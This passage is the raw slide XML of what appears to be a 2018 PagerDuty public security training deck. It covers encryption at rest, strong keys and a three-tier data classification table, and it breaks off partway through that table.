          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="457200"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption at Rest</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4" name="Encryption at Rest"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption at Rest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1135"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136"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137" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="What do we want? Stored information cannot be read by unauthorized parties.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What do we want?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Stored information cannot be read by unauthorized parties.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How do we do it?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>AES-256, KMS, Full Disk Encryption, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anything else?</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>Be sure to use strong keys. Weak keys = Weak encryption.</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43" name="thinking-monkey-2.jpg" descr="thinking-monkey-2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="25000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50800" y="-99484"/>
            <a:ext cx="24485600" cy="15303501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144" name="“Should I encrypt that?”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Should I encrypt that?”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1145" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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1146"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147" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148"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2" name="professor.png" descr="professor.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8931526" y="373091"/>
            <a:ext cx="12910379" cy="13378628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="273"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274"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75" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="“The framework takes care of that for me…”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594774" y="4536281"/>
            <a:ext cx="23194452" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="457200">
              <a:defRPr sz="9000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“The framework takes care of that for me…”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Often starts with “Well, actually…”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073045" y="8597674"/>
            <a:ext cx="393484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2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Often starts with “Well, actually…”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2097960" y="7359197"/>
            <a:ext cx="361813" cy="1147563"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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152" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2851546" y="-42068"/>
            <a:ext cx="18538104" cy="13847479"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1153"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154"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155" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359830" y="930580"/>
            <a:ext cx="21664340" cy="10980965"/>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1" name="Data Classification"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Data Classification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1162"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16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164" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166" name="General Data"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2294583" y="4693973"/>
            <a:ext cx="4687765"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rgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>General Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167" name="Business Data"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1869387" y="7223336"/>
            <a:ext cx="5068765"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rgbClr val="5DB2F4"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Business Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Customer Data"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622174" y="9756839"/>
            <a:ext cx="5279728"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6000">
                <a:solidFill>
                  <a:srgbClr val="FF320A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Customer Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Anything intentionally available to the public."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7736585" y="4769139"/>
            <a:ext cx="1261683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i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Anything </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>intentionally</a:t>
            </a:r>
            <a:r>
              <a:t> available to the public.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Anything used to operate the business."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7736585" y="7298501"/>
            <a:ext cx="1113444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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Anything used to operate the business.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Anything provided by the customer."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7736585" y="9829934"/>
            <a:ext cx="10074660"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i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Anything provided by the customer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1172" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993472" y="4279496"/>
            <a:ext cx="22320858" cy="1890371"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10077"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031571" y="6808858"/>
            <a:ext cx="22320858" cy="1890372"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10077"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5DB2F4"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993471" y="9338222"/>
            <a:ext cx="22320859" cy="1890371"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10077"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FF320A"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pP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178" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4428804" y="6551203"/>
          <a:ext cx="19068549" cy="3859147"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="0" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2722263"/>
                <a:gridCol w="2722263"/>
                <a:gridCol w="2722263"/>
                <a:gridCol w="2722263"/>
                <a:gridCol w="2722263"/>
                <a:gridCol w="2722263"/>
                <a:gridCol w="2722263"/>
              </a:tblGrid>
              <a:tr h="1247626">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="25C151"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="25C151"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="25C151"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="25C151"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="25C151"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="25C151"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="25C151"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1261841">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="5DB2F4"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="5DB2F4"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
